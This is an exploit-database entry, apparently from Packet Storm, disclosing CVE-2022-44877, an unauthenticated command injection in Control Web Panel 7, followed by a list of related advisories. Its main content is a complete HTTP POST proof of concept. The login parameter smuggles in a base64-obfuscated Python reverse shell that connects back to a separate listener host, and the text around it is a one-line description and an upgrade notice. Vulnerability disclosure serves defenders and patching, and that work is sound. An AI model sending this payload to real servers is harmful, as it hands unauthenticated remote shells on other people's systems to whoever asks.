Lucene search
Numan turlePACKETSTORM:170388HistoryJan 09, 2023 - 12:00 a.m.
Control Web Panel 7 Remote Code Execution
2023-01-0900:00:00
numan turle
packetstormsecurity.com
123
`[+] Centos Web Panel 7 Unauthenticated Remote Code Execution
[+] Centos Web Panel 7 - < 0.9.8.1147
[+] Affected Component ip:2031/login/index.php?login=$(whoami)
[+] Discoverer: Numan TΓΌrle @ Gais Cyber Security
[+] Vendor: https://centos-webpanel.com/ - https://control-webpanel.com/changelog#1669855527714-450fb335-6194
[+] CVE: CVE-2022-44877
Description
--------------
Bash commands can be run because double quotes are used to log incorrect entries to the system.
Video Proof of Concept
--------------
https://www.youtube.com/watch?v=kiLfSvc1SYY
Proof of concept:
--------------
POST /login/index.php?login=$(echo${IFS}cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMTMuMzcuMTEiLDEzMzcpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5LnNwYXduKCJzaCIpJyAg${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash) HTTP/1.1
Host: 10.13.37.10:2031
Cookie: cwpsrv-2dbdc5905576590830494c54c04a1b01=6ahj1a6etv72ut1eaupietdk82
Content-Length: 40
Origin: https://10.13.37.10:2031
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://10.13.37.10:2031/login/index.php?login=failed
Accept-Encoding: gzip, deflate
Accept-Language: en
Connection: close
username=root&password=toor&commit=Login
--------------
Solution
--------
Upgrade to CWP7 current version.
`
Related
packetstorm
packetstorm
Control Web Panel Unauthenticated Remote Command Execution
2023-01-31 00:00:00
Control Web Panel 7 (CWP7) 0.9.8.1147 Remote Code Execution
2023-04-06 00:00:00
nessus
nessus
zdt
zdt
Control Web Panel Unauthenticated Remote Command Execution Exploit
2023-01-31 00:00:00
Control Web Panel 7 (CWP7) v0.9.8.1147 - Remote Code Execution Exploit
2023-04-05 00:00:00
Control Web Panel 7 Remote Code Execution Vulnerability
2023-01-10 00:00:00
cisa_kev
cisa_kev
CWP Control Web Panel OS Command Injection Vulnerability
2023-01-17 00:00:00
prion
prion
Design/Logic Flaw
2023-01-05 23:15:00
cve
cve
CVE-2022-44877
2023-01-05 23:15:09
nuclei
nuclei
CentOS Web Panel 7 <0.9.8.1147 - Remote Code Execution
2023-01-07 07:01:12
wizblog
wizblog
attackerkb
attackerkb
CVE-2022-44877
2023-01-05 00:00:00
metasploit
metasploit
CWP login.php Unauthenticated RCE
2023-01-20 14:04:24
githubexploit
githubexploit
Exploit for OS Command Injection in Control-Webpanel Webpanel
2023-02-15 15:22:48
Exploit for OS Command Injection in Control-Webpanel Webpanel
2024-02-27 15:09:50
Exploit for OS Command Injection in Control-Webpanel Webpanel
2023-01-06 16:53:51
thn
thn
exploitdb
exploitdb
Centos Web Panel 7 v0.9.8.1147 - Unauthenticated Remote Code Execution (RCE)
2023-04-01 00:00:00
Control Web Panel 7 (CWP7) v0.9.8.1147 - Remote Code Execution (RCE)
2023-04-05 00:00:00
rapid7blog
rapid7blog
Exploitation of Control Web Panel CVE-2022-44877
2023-01-19 19:04:48
Metasploit Weekly Wrap-Up
2023-02-03 19:21:26
Whatβs New in InsightVM and Nexpose: Q1 2023 in Review
2023-03-31 15:44:29
trellix
trellix
The Bug Report January 2023 Edition
2023-02-01 00:00:00
The Bug Report January 2023 Edition
2023-02-01 00:00:00
Related for PACKETSTORM:170388